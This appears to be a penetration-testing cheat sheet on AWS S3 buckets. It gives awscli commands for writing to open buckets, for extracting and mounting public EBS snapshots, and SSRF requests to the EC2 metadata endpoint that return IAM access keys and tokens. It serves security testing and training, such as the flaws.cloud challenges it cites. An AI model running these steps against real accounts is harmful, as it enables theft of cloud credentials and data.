Amazon Bucket S3 AWS
- AWS Configuration
- Open Bucket
- Basic tests
- AWS - Extract Backup
- Bucket juicy data
Prerequisites, at least you need awscli
You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
then you can use --profile nameofprofile in the aws command.
Alternatively you can use environment variables instead of creating a profile.
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
Their names are also listed if the listing is enabled.
Alternatively you can extract the name of inside-site s3 bucket with
%C0. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
You can get the region with a dig and nslookup
Move a file into the bucket
aws s3 mv test.txt s3://hackerone.marketing FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied." aws s3 mv test.txt s3://hackerone.files SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
Download every things
Check bucket disk size
--no-sign for un-authenticated check.
AWS - Extract Backup
$ aws --profile flaws sts get-caller-identity "Account": "XXXX26262029", $ aws --profile profile_name ec2 describe-snapshots $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2 "SnapshotId": "snap-XXXX342abd1bdcb89", Create a volume using snapshot $ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89 In Aws Console -> EC2 -> New Ubuntu $ chmod 400 YOUR_KEY.pem $ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com Mount the volume $ lsblk $ sudo file -s /dev/xvda1 $ sudo mount /dev/xvda1 /mnt
Bucket juicy data
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/user-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
- There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis
- Bug Bounty Survey - AWS Basic test
- flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route
- flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route
- Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh
- AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity
- AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity
- A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019